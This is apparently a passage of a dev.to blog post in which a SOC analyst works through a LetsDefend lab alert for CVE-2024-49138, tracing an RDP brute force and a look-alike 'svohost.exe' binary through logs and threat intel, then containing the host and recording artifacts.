&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqbao18k3pr989jh9iwq3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqbao18k3pr989jh9iwq3.png" alt="svohost.exe information" width="800" height="415"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is the information for &lt;code&gt;svohost.exe&lt;/code&gt; on the endpoint "Victor".&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F61sl4hh7srqseddbxqmk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F61sl4hh7srqseddbxqmk.png" alt="affected" width="800" height="472"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When I search for the affected host's (Victor) IP in Log Management and run through the logs, I find that there have been multiple failed logon attempts targeting the destination's RDP port (port 3389).&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;EventID 4625 (failed logon)&lt;/li&gt;
&lt;li&gt;Error code 0xC000006D (bad username or password)&lt;/li&gt;
&lt;li&gt;Attempts for accounts like "admin" and "guest"&lt;/li&gt;
&lt;li&gt;Source IP: 185[.]107[.]56[.]141&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For successful logon:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;EventID 4624 (successful logon)&lt;/li&gt;
&lt;li&gt;Logon Type 10 (RemoteInteractive) (typically RDP)&lt;/li&gt;
&lt;li&gt;Username: Victor&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Next, I search for the source IP 185[.]107[.]56[.]141 in Threat Intel on Letsdefend, and the IP is tagged "Brute Force".&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6s7vzd3du1e0d593adao.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6s7vzd3du1e0d593adao.png" alt="Brute Force" width="800" height="417"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is a strong confirmation that the activity was malicious.&lt;/p&gt;

&lt;p&gt;EventID: 313&lt;br&gt;
Event Time: Jan 22, 2025, 02:37 AM&lt;br&gt;
Rule: SOC335 - CVE-2024-49138 Exploitation Detected&lt;br&gt;
Alert category: True Positive&lt;/p&gt;

&lt;p&gt;Now to answer the questions in the playbook:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnhgmc9cs8ud0gqopldbi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnhgmc9cs8ud0gqopldbi.png" alt="playbookq1" width="800" height="370"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I pick the first option because of the command we saw that downloads a malicious file from a remote S3 bucket and then executes &lt;code&gt;svohost.exe&lt;/code&gt;. Such behavior is a red flag for outbound connections to Command and Control (C2) infrastructure.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fayfeu2wajblgclpf43yw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fayfeu2wajblgclpf43yw.png" alt="malwarequaratined" width="800" height="389"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The malware was allowed and not quarantined or cleaned up.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7hwjbgdep8pi29zf3htd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7hwjbgdep8pi29zf3htd.png" alt="malwareanalyze" width="800" height="438"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next we move ahead with analyzing the malware. From the Virustotal scan, we know it is malicious.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F82l979jwugu1exj8fup6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F82l979jwugu1exj8fup6.png" alt="c2requested" width="800" height="445"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In Log Management, the suspicious IP (185.107.56.141) appears in events targeting the host (172.16.17.207) and is also tied to remote access activity, so the malicious address was observed in logs.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fidxmp2d4gt1269usmi6j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fidxmp2d4gt1269usmi6j.png" alt="containit" width="800" height="404"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next, we move ahead with containing the affected host.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhba42okxbgeg08xnipe1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhba42okxbgeg08xnipe1.png" alt="contained" width="800" height="440"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff5yq3kn7bypxwl4nzstd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff5yq3kn7bypxwl4nzstd.png" alt="Artifacts" width="800" height="528"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Adding the artifacts: the malicious sender IP, the MD5 hash of the malicious file (from Virustotal), and the malicious code snippet that was running on the terminal.&lt;/p&gt;

&lt;p&gt;Analyst's notes:&lt;br&gt;
I have determined this alert to be a True Positive, as the host Victor (172.16.17.207) executed a suspicious look-alike binary, &lt;code&gt;svohost.exe&lt;/code&gt;, from &lt;code&gt;C:\temp\service_installer\&lt;/code&gt; under an unusual user context with &lt;code&gt;powershell.exe&lt;/code&gt; as its parent, and the file hash is tagged in Threat Intel with CVE-2024-49138. Log Management reveals that the source IP &lt;code&gt;185.107.56.141&lt;/code&gt; repeatedly targeted the host over RDP (port 3389), with Windows security events showing multiple failed logons (4625 / 0xC000006D) followed by a successful remote logon (4624, Logon Type 10) from the same IP, indicating a successful brute force attack—further supported by Threat Intel flagging the IP as "Brute Force." Since the device action was logged as "Allowed," real-world containment would require immediate isolation of the endpoint, blocking the malicious IP, quarantining &lt;code&gt;svohost.exe&lt;/code&gt;, and resetting compromised credentials.&lt;/p&gt;

</description>
      <category>soc</category>
      <category>cybersecurity</category>
      <category>letsdefend</category>
      <category>securityanalysis</category>
    </item>
  </channel>
</rss>
